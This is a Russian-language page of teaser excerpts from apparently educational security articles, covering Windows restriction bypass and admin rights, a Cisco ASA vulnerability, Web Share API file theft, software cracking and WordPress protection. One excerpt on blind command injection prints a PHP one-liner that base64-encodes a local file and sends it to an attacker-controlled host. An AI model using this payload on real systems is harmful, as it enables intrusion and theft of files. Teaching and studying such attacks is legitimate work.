#Обучение Когда ты приходишь на работу и обнаруживаешь, что на компьютере что-то запрещено, а в Сети — заблокировано, это воспринимается практически как вызов. В своей статье я расскажу, какие бывают методы ограничений и как с ними бороться. Многие из описанных трюков мне приходилось проделывать самостоятельно — конечно же, исключительно с благими намерениями. В итоге вы научитесь как получить права админа в Windows. Понятно, что ограничения важны для безопасности и снижения нагрузки на эникейщиков, но обычно…

#Обучение Сегодня поговорим немного о нашумевшей уязвимости в Cisco Оперативно искать решение проблемы IT-компании заставил Михаил Ключников. Эксперт из Positive Technologies не впервые находит опасные уязвимости. Данная уязвимость касается межсетевого экрана Cisco ASA. И получив идентификатор CVE-2020-3452,она имеет высокий уровень опасности. Если на устройстве проигнорирована проверка вводных данных, то атакующий получает доступ к файловой системе и может читать файлы конфигурации WebVPN. Компания…

#Обучение Индустрия информационной безопасности обожает фетишизировать новые термины. В наши дни в интернете нетрудно найти статьи об обнаружении хакерами или исследователями уязвимостей в таких вещах, как автомобили, холодильники, гостиницы и квартирные сигнализации. Все это объединено в концепцию, получившую название «интернет вещей» (Internet of Things, сокращенно IoT). Сегодня это одна из наиболее фетишизируемых тем в индустрии. Проблема с многочисленными исследованиями на эту тему состоит в том, что мы…

#Обучение Электронная коммерция — одна из самых больших и быстро растущих областей, в связи с чем она привлекает внимание как исследователей информационной безопасности, так и злоумышленников. Поэтому хотелось бы разобраться в некоторых аспектах механизмов безопасности, применяемых при проведении онлайн-платежей.  Один из протоколов, используемых для увеличения безопасности онлайн-платежей — 3D Secure. Это протокол, который был разработан на основе XML в качестве дополнительного уровня безопасности платежей…

#Обучение Уязвимость «внедрение команд» (также называют «удалённое выполнение кода») позволяет выполнять команды на уровне операционной системы. Такие уязвимости могут быть найдены в веб-приложениях, роутерах.  Тренировка в эксплуатации слепого внедрения команд  Для тренировки нам понадобятся:  машина с веб-сервером и уязвимым веб-приложением  веб-сервер атакующего — может быть вторая машина в локальной сети или ваш хостинг  На самом деле, при реальной эксплуатации можно обойтись без прямого IP. Роль уязвимого…

#Обучение Когда-то считалось, что система локальной безопасности Windows похожа на кованые железные ворота с хитрым замком, стоящие посреди чистого поля: выглядят грозно, но вот эффективность весьма сомнительна. Времена меняются, и механизмы защиты винды понемногу эволюционируют. Сегодня мы поговорим о том, как устроена безопасность в современных версиях Windows. WARNING Вся информация предоставлена исключительно в ознакомительных целях. Ни редакция, ни автор не несут ответственности за любой возможный вред…

#Обучение В этой статье описан метод кражи содержимого локальных файлов пользователей MacOS и iOS, предлагаю заглянуть в историю браузера и прочесть файл /etc/passwd. Web Share API [https://w3c.github.io/web-share/] позволяет пользователям обмениваться ссылками из браузера через сторонние приложения (например, почту и приложения для обмена сообщениями). Проблема в том, что схема file: разрешена, и когда веб-сайт указывает на URL-адрес, которым целевое устройство намерено поделиться, происходит неожиданное поведение.…

#Обучение Поскольку никакая информация не выводится, нам нужно использовать что-то более сложное, чем внедрение команды «cat ИМЯ-ФАЙЛА».  В качестве полезной нагрузки (основанной только на PHP) можно использовать следующее:  php -r 'file_get_contents("http://IP-АТАКУЮЩЕГО/c.php?b=" . base64_encode(file_get_contents("/ПУТЬ/ДО/ФАЙЛА")));' В приведённой полезной нагрузке нужно указать свои значения для:   IP-АТАКУЮЩЕГО   /ПУТЬ/ДО/ФАЙЛА  Пример для моего случая:  php -r 'file_get_contents("http://192.168.56.104/c.php?b="…

#Обучение UDP – это передача данных без установления соединения, которое не имеет подтверждения связи и, таким образом, не дает никаких гарантий относительно доставки или порядка получения пакетов. Но что это означает на практике? Карл Сегин (Karl Seguin) провел эксперимент, чтобы выяснить, какова же надежность такого способа передачи данных. Он создал 5 VPS для отправки друг другу нескольких UDP-пакетов в течение 7 часов. Карл не посылал много трафика (хотя, как он отмечает, это, конечно, стоит попробовать).…

#Обучение PowerShell скрипт для быстрого аудита AD  _____ ____ _____ _ _ _ | _ | | _ |_ _ _| |_| |_ | | | | | | | | . | | _| |__|__|____/ |__|__|___|___|_|_| by phillips321 Запустите непосредственно на DC с помощью DA.  Если вы не доверяете коду, я предлагаю сначала прочитать его, и вы увидите, что все это безвредно!  (Но разве вы не должны делать это с кодом, который вы загружаете из сети, а затем запускаете как DA ??)  Что он делает  Информация об устройстве …

#Обучение Как гласит народная мудрость, театр начинается с вешалки, а программа — с инсталляции. Но что делать, если инсталлятор не желает запускаться или, хуже того, не хочет устанавливать приложение? Любой читатель «Хакера» уверенно скажет: ломать! И будет прав. Сегодня мы поговорим о том, как сделать это просто, быстро и без лишних усилий. Здравствуйте, мои юные ленивые друзья. Признайтесь честно: основная причина, по которой вы читаете этот текст, — желание научиться ломать программы форсированным методом…

#Обучение WordPress — самая распространенная система управления сайтом и по этой причине вызывает большой интерес у вирусописателей и хакеров. В сегодняшней статье мы поговорим о защите WordPress. Проанализируем работу самых популярных плагинов для защиты WordPress в базовой комплектации по принципу «установил из репозитория и запустил», то есть глазами простого пользователя, без платных подписок и расширенных версий. А еще рассмотрим некоторые мифы, касающиеся качества плагинов и тем из официального репозитория.…

#Полезное Мы были где-то на трассе М-11, неподалеку от Вышнего Волочка, когда нас стало накрывать. Помню, промямлил что-то типа: «Чувствую, меня немного колбасит; может, ты поведешь?..» И неожиданно я разразился сухим кашлем, шатающим машину, несущуюся на пределе двухсот километров в час прямо в Санкт-Петербург. И чей-то голос возопил: «Господи Иисусе! Да откуда взялась эта чертова зараза?!» Затем все снова стихло. Мой адвокат лил сироп от кашля себе в горло прямо из бутылки. «Какого хрена ты так задыхаешься?»…